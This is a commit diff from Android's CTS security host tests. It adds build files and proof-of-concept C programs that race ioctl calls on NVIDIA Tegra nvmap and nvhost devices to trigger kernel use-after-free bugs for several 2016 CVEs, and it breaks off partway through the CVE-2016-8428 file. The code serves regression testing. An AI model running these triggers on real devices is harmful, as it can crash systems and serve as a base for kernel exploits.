Commit for some of the critical bugs in December 20016
Test: this is a test
Change-Id: I8844dd82b0a7be912166746bd330ad3e819b81e9
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 3f3894b..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -16,7 +16,34 @@
<configuration description="Config for the CTS Security host tests">
<target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
<option name="cleanup" value="true" />
+ <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+ <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+ <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+ <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+ <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+ <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+ <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+ <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+ <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+ <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+ <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+ <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+ <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+ <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+ <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+ <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+ <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+ <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+ <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+ <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+ <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+ <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
<option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+ <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+ <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+ <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+ <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+ <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
<option name="append-bitness" value="true" />
</target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+ static int data = 1024;
+ ioctl(g_fd, NVMAP_IOC_FREE, data);
+ //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(0, 2);
+
+ int i;
+ while (1) {
+ if (init == 0) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ init = 1;
+ }
+ trigger_nvmap_free();
+ }
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ if (init == 0)
+ pthread_cond_signal(&cond);
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ printf("[+] %03d times\n", i);
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+ int ioarg[2];
+ switch ((long)arg) {
+ case 0:
+ fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+ break;
+ case 1:
+ fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+ break;
+ case 2:
+ ioarg[0] = fd_dbg_1;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+ break;
+ case 3:
+ fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+ break;
+ case 4:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ case 5:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ }
+ return 0;
+}
+int poc()
+{
+ long i;
+ pthread_t th;
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ usleep(10000);
+ }
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ if (i%2==0)
+ usleep(10000);
+ }
+ usleep(100000);
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ while(1){
+ pid = fork();
+ if(pid){
+ usleep(30000);
+ }else
+ return poc();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+ __u64 handles; /* Ptr to u32 type array, holding handles */
+ __u64 offsets; /* Ptr to u32 type array, holding offsets
+ * into handle mem */
+ __u64 sizes; /* Ptr to u32 type array, holindg sizes of memory
+ * regions within each handle */
+ __u32 nr; /* Number of handles */
+ __s32 op; /* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
